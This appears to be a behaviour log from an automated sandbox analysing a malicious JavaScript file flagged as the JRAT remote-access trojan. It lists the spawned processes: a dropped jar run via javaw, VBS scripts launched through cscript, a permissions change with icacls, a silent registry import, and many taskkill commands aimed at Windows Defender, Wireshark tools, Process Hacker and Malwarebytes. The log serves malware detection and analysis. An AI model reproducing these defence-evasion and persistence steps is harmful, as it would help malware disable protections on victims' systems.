Source: api-ms-win-core-libraryloader-l1-1-0.dll.18.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-console-l1-1-0.dll.18.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-console-l1-2-0.dll.18.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-process-l1-1-0.dll.18.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-locale-l1-1-0.dll.18.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-localization-l1-2-0.dll.18.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-private-l1-1-0.dll.18.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-convert-l1-1-0.dll.18.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-file-l1-1-0.dll.18.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-file-l1-2-0.dll.18.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-handle-l1-1-0.dll.18.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-multibyte-l1-1-0.dll.18.dr Static PE information: No import functions for PE file found
Source: API-MS-Win-core-xstate-l2-1-0.dll.18.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-string-l1-1-0.dll.18.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-errorhandling-l1-1-0.dll.18.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-memory-l1-1-0.dll.18.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-processthreads-l1-1-1.dll.18.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-rtlsupport-l1-1-0.dll.18.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-string-l1-1-0.dll.18.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-synch-l1-2-0.dll.18.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-synch-l1-1-0.dll.18.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-math-l1-1-0.dll.18.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-file-l2-1-0.dll.18.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-utility-l1-1-0.dll.18.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-filesystem-l1-1-0.dll.18.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-processthreads-l1-1-0.dll.18.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-util-l1-1-0.dll.18.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-time-l1-1-0.dll.18.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-conio-l1-1-0.dll.18.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-environment-l1-1-0.dll.18.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-heap-l1-1-0.dll.18.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-profile-l1-1-0.dll.18.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-debug-l1-1-0.dll.18.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-heap-l1-1-0.dll.18.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-sysinfo-l1-1-0.dll.18.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-runtime-l1-1-0.dll.18.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-stdio-l1-1-0.dll.18.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-namedpipe-l1-1-0.dll.18.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-timezone-l1-1-0.dll.18.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-datetime-l1-1-0.dll.18.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-processenvironment-l1-1-0.dll.18.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-interlocked-l1-1-0.dll.18.dr Static PE information: No import functions for PE file found
Source: C:\Users\user\AppData\Roaming\cmukyspiy.txt, type: DROPPED Matched rule: MAL_JRAT_Oct18_1 date = 2018-10-11, hash1 = ce190c37a6fdb2632f4bc5ea0bb613b3fbe697d04e68e126b41910a6831d3411, author = Florian Roth, description = Detects JRAT malware, reference = Internal Research
Source: C:\Users\user\AppData\Local\Temp\_0.335919510014015658379257619551515348.class, type: DROPPED Matched rule: MAL_JRAT_Oct18_1 date = 2018-10-11, hash1 = ce190c37a6fdb2632f4bc5ea0bb613b3fbe697d04e68e126b41910a6831d3411, author = Florian Roth, description = Detects JRAT malware, reference = Internal Research
Source: classification engine Classification label: mal100.phis.troj.expl.evad.winJS@184/298@1/2
Source: C:\Windows\System32\wscript.exe File created: C:\Users\user\AppData\Roaming\cmukyspiy.txt
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2688:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4428:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7584:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7676:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7220:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7208:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7060:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6236:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7280:120:WilError_03
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7196:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7628:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4504:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3060:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8172:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2640:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7600:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7232:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8160:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7788:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3844:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7108:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3544:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7816:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7488:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:736:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7544:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6380:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2816:120:WilError_03
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe File created: C:\Users\user\AppData\Local\Temp\hsperfdata_user
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C cscript.exe C:\Users\user\AppData\Local\Temp\Retrive8340316412854535662.vbs
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\cmd.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\cscript.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\xcopy.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\wscript.exe File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: java.exe String found in binary or memory: U2]nonvalidating/load-external-dtd
Source: java.exe String found in binary or memory: Knonvalidating/load-dtd-grammar
Source: java.exe String found in binary or memory: L'http://apache.org/xml/features/nonvalidating/load-external-dtd
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\gcahfpmhcn.js"
Source: C:\Windows\System32\wscript.exe Process created: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe "C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe" -jar "C:\Users\user\AppData\Roaming\cmukyspiy.txt"
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\icacls.exe C:\Windows\system32\icacls.exe C:\ProgramData\Oracle\Java\.oracle_jre_usage /grant "everyone":(OI)(CI)M
Source: C:\Windows\SysWOW64\icacls.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe "C:\Program Files (x86)\Java\jre-1.8\bin\java.exe" -jar C:\Users\user\AppData\Local\Temp\_0.335919510014015658379257619551515348.class
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C cscript.exe C:\Users\user\AppData\Local\Temp\Retrive8340316412854535662.vbs
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cscript.exe cscript.exe C:\Users\user\AppData\Local\Temp\Retrive8340316412854535662.vbs
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C cscript.exe C:\Users\user\AppData\Local\Temp\Retrive4143913798509633277.vbs
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cscript.exe cscript.exe C:\Users\user\AppData\Local\Temp\Retrive4143913798509633277.vbs
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C cscript.exe C:\Users\user\AppData\Local\Temp\Retrive4329570775648502228.vbs
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C cscript.exe C:\Users\user\AppData\Local\Temp\Retrive6110391193418258336.vbs
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cscript.exe cscript.exe C:\Users\user\AppData\Local\Temp\Retrive4329570775648502228.vbs
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cscript.exe cscript.exe C:\Users\user\AppData\Local\Temp\Retrive6110391193418258336.vbs
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\xcopy.exe xcopy "C:\Program Files (x86)\Java\jre-1.8" "C:\Users\user\AppData\Roaming\Oracle\" /e
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Process created: C:\Windows\SysWOW64\xcopy.exe xcopy "C:\Program Files (x86)\Java\jre-1.8" "C:\Users\user\AppData\Roaming\Oracle\" /e
Source: C:\Windows\SysWOW64\xcopy.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\xcopy.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM UserAccountControlSettings.exe /T /F
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c regedit.exe /s C:\Users\user\AppData\Local\Temp\XGkhOkmDsC474469576599115670.reg
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\regedit.exe regedit.exe /s C:\Users\user\AppData\Local\Temp\XGkhOkmDsC474469576599115670.reg
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\regedit.exe "C:\Windows\system32\regedit.exe" /s C:\Users\user\AppData\Local\Temp\XGkhOkmDsC474469576599115670.reg
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\regedit.exe "C:\Windows\SysWOW64\regedit.exe" /s C:\Users\user\AppData\Local\Temp\XGkhOkmDsC474469576599115670.reg
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM ProcessHacker.exe /T /F
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM procexp.exe /T /F
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM MSASCui.exe /T /F
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM MsMpEng.exe /T /F
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM MpUXSrv.exe /T /F
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\wbem\WMIC.exe WMIC /Node:localhost /Namespace:\\root\cimv2 Path Win32_PnpSignedDriver Get /Format:List
Source: C:\Windows\SysWOW64\wbem\WMIC.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM MpCmdRun.exe /T /F
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM NisSrv.exe /T /F
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM ConfigSecurityPolicy.exe /T /F
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM procexp.exe /T /F
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM wireshark.exe /T /F
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM tshark.exe /T /F
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM text2pcap.exe /T /F
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM rawshark.exe /T /F
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM mergecap.exe /T /F
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM editcap.exe /T /F
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM capinfos.exe /T /F
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM mbam.exe /T /F
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\wscript.exe Process created: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe "C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe" -jar "C:\Users\user\AppData\Roaming\cmukyspiy.txt"
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\icacls.exe C:\Windows\system32\icacls.exe C:\ProgramData\Oracle\Java\.oracle_jre_usage /grant "everyone":(OI)(CI)M
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe "C:\Program Files (x86)\Java\jre-1.8\bin\java.exe" -jar C:\Users\user\AppData\Local\Temp\_0.335919510014015658379257619551515348.class
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C cscript.exe C:\Users\user\AppData\Local\Temp\Retrive8340316412854535662.vbs
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C cscript.exe C:\Users\user\AppData\Local\Temp\Retrive6110391193418258336.vbs
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\xcopy.exe xcopy "C:\Program Files (x86)\Java\jre-1.8" "C:\Users\user\AppData\Roaming\Oracle\" /e
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM UserAccountControlSettings.exe /T /F
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c regedit.exe /s C:\Users\user\AppData\Local\Temp\XGkhOkmDsC474469576599115670.reg
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM ProcessHacker.exe /T /F
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM procexp.exe /T /F
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM MSASCui.exe /T /F
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM MpUXSrv.exe /T /F
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C cscript.exe C:\Users\user\AppData\Local\Temp\Retrive4143913798509633277.vbs
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM MpCmdRun.exe /T /F
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM NisSrv.exe /T /F
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM ConfigSecurityPolicy.exe /T /F
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM wireshark.exe /T /F
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM tshark.exe /T /F
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM text2pcap.exe /T /F
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM rawshark.exe /T /F
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM mergecap.exe /T /F
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM editcap.exe /T /F
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\cscript.exe cscript.exe C:\Users\user\AppData\Local\Temp\Retrive4143913798509633277.vbs
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C cscript.exe C:\Users\user\AppData\Local\Temp\Retrive4143913798509633277.vbs
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C cscript.exe C:\Users\user\AppData\Local\Temp\Retrive4329570775648502228.vbs
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Process created: C:\Windows\SysWOW64\xcopy.exe xcopy "C:\Program Files (x86)\Java\jre-1.8" "C:\Users\user\AppData\Roaming\Oracle\" /e
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cscript.exe cscript.exe C:\Users\user\AppData\Local\Temp\Retrive8340316412854535662.vbs
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cscript.exe cscript.exe C:\Users\user\AppData\Local\Temp\Retrive4143913798509633277.vbs
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cscript.exe cscript.exe C:\Users\user\AppData\Local\Temp\Retrive4329570775648502228.vbs
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cscript.exe cscript.exe C:\Users\user\AppData\Local\Temp\Retrive6110391193418258336.vbs
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\regedit.exe regedit.exe /s C:\Users\user\AppData\Local\Temp\XGkhOkmDsC474469576599115670.reg
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\regedit.exe "C:\Windows\system32\regedit.exe" /s C:\Users\user\AppData\Local\Temp\XGkhOkmDsC474469576599115670.reg
Source: C:\Windows\System32\wscript.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sxs.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: jscript.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: scrobj.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: scrrun.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: msdart.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: msxml3.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: mlang.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
